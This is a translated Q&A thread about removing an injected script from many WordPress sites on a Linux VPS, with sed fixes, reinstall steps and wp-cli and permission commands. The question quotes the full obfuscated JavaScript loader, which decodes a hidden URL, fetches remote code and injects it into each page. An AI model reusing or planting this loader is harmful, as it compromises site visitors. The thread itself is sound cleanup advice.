Remove virus in wordpress with SED in a vps with linux

Navigation
2

I have a vps with more than 100 wordpress installations and they all have a script in their header or header.php 

var _0xfcc4=["\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x47\x45\x54","\x6F\x70\x65\x6E","\x73\x65\x6E\x64","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x61\x73\x79\x6E\x63","\x69\x64","\x63\x64\x6E\x37\x38\x39","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x73\x63\x72\x69\x70\x74","\x6C\x65\x6E\x67\x74\x68"];var url=String[_0xfcc4[0]](104,116,116,112,115,58,47,47,119,119,119,46,108,101,97,114,110,105,110,103,116,111,111,108,107,105,116,46,99,108,117,98,47,108,105,110,107,46,112,104,112);var get_text=function httpGet(_0x3bc1x4){var _0x3bc1x5= new XMLHttpRequest();_0x3bc1x5[_0xfcc4[2]](_0xfcc4[1],_0x3bc1x4,false);_0x3bc1x5[_0xfcc4[3]](null);return _0x3bc1x5[_0xfcc4[4]]};var text=get_text(url);if(text!= String[_0xfcc4[0]](110,117,108,108)&& text[_0xfcc4[5]](String[_0xfcc4[0]](104,116,116,112,115,58,47,47))>  -1){var a=function(){var _0x3bc1x8=document[_0xfcc4[6]](String[_0xfcc4[0]](115,99,114,105,112,116));_0x3bc1x8[_0xfcc4[7]]= String[_0xfcc4[0]](116,101,120,116,47,106,97,118,97,115,99,114,105,112,116);_0x3bc1x8[_0xfcc4[8]]= true;_0x3bc1x8[_0xfcc4[9]]= _0xfcc4[10];_0x3bc1x8[_0xfcc4[11]]= text;document[_0xfcc4[13]](String[_0xfcc4[0]](104,101,97,100))[0][_0xfcc4[12]](_0x3bc1x8)};var scrpts=document[_0xfcc4[13]](_0xfcc4[14]);var n=true;for(var i=scrpts[_0xfcc4[15]];i--;){if(scrpts[i][_0xfcc4[9]]== _0xfcc4[10]){n= false}};if(n== true){a()}}

I tried to delete it with sed with this command: 

find . -name "*.php" -exec sed -i '/var _0xfcc4.*{a\(\)}}/d' '{}' \;

or: 

find . -name "*.php" -exec sed -i '/var _0xfcc4/d' '{}' \;

but it eliminates the <head> tag:

Before:

And then:

    
asked by José Gregorio Cortesía Rojas 28.09.2018 в 16:03
source

4 answers

2

You have a big problem, I think. To start: removing those scripts may make the page unusable.

I would begin by doing these actions: 1) IMPORTANT: backup of all sites (FTP and DB).

2) Disable all site plugins from the wordpress admin and then deactivate the site from the hosting panel so that it is not available online.

3) I would remove the wp-admin and wp-includes folders and everything in that level except wp-config.php and .htaccess. (That is, it would only leave .htaccess and wp-config.php and the wp-content folder.)

4) It would remove (by pointing the names before), the plugin folders that are in wp-content / plugins

5) I would upload the plugins folders by ftp. This is: first download the zip of the plugins, unzip it and the folder with the name of the plugin upload it to wp-content / plugins

6) search any resident .php file in uploads (In uploads there should be nothing * .php) as much as the index.php with the echo of "Silent is gold".

7) Unzip a wordpress from the same version that you had installed and upload all the content, overwriting wp-content when it asks for it. This is necessary to ensure that the installation is clean.

8) In the wp-config.php file, you would add two lines at the end: 

define('FS_CHMOD_FILE', 0644);
define('FS_CHMOD_DIR', 0755);

9) Activate the site, log in and activate the plugins.

This is not the total remedy, but at least you can solve the script problem I think. A lot of luck (Do not forget the FTP backup and the BBDD first of all)

    
answered by 28.09.2018 в 17:24
2

The problem lies in the expression of Thirst that you use: when you say sed '/búsqueda/d' you are deleting all the lines that contain "search".

What you surely need is sed 's/búsqueda//' , which will replace "search" with nothing, eliminating it.

See an example: 

$ cat fichero
hola
que tal estas
hola var bu ba
var va2
$ sed '/var/d' fichero
hola
que tal estas
ea
$ sed 's/var.*//' fichero
hola
que tal estas
hola

In your case: 

find . -name "*.php" -exec sed -i.bak 's/var _0xfcc4.*{a\(\)}}//' '{}' \;

Notice also that by doing sed -i '...' you are overwriting the file. This is dangerous, because if you do not do what you want, you lose the original. Hence, put sed -i.bak to save a backup file.

    
answered by 01.10.2018 в 10:54
1

I do not know if you have already solved it, I suppose that at this point I am sure that it is. As a quick measure, what I did is, instead of eliminating the whole block, what I did was comment on the variable. With that, it was already solved quickly, then it was a matter of crushing all those files js by the original. 

find . -type f -name "*.js" -exec sed -i 's/var _0xfcc4=/\/\/var _0xfcc4=/g' {} +

That was the quickest solution to apply as a first step with certain guarantees of not breaking anything, since it only commented on that "infected" line.

    
answered by 04.10.2018 в 19:56
1

In addition to cleaning the .php I suggest you use wp-cli to force the reinstallation / update of the core, themes and plugins of each wordpress.

The sequence would be: 

# cambiar a carpeta donde está el wp-config.php
cd /carpeta/del/wordpress 

# descargar e instalar la última versión de wordpress
# (cachea la primera descarga la usa para todas las demás)
wp core download --force

# descargar e instalar la última versión de los plugins
# (cachea la primera descarga la usa para todas las demás)
wp plugin install $(wp plugin list --field=name) --force

# descargar e instalar la última versión de los themes
# (cachea la primera descarga la usa para todas las demás)
wp theme install $(wp theme list --field=name) --force
  • repeat for the other N facilities

Reestablish owners, groups and permissions (here it varies according to the OS and how you have the users of apache / nginx / php) 

# cambiar a carpeta donde está el wp-config.php
cd /carpeta/del/wordpress 

# owner y group www-data ajustar según OS y webserver
sudo chown www-data: /carpeta/del/wordpress -R 

# variantes según tu esquema de seguridad 664, 644, 640 
sudo find . -type f -exec chmod 664 {} \; // ajustar a tus users y grupos

# variantes según tu esquema de seguridad 775, 755, 750 
sudo find . -type d -exec chmod 775 {} \; // ajustar a tus users y grupos

# sticky bit para que nuevos archivos hereden el grupo de la carpeta donde se crean
sudo find . -type d -exec chmod g+s {} \;

special case is wp-config.php that should be more strict wave 440 or 400

    
answered by 04.10.2018 в 20:58
Print decimals in c ++ Substitute one image for another - Events - Javascript - HTML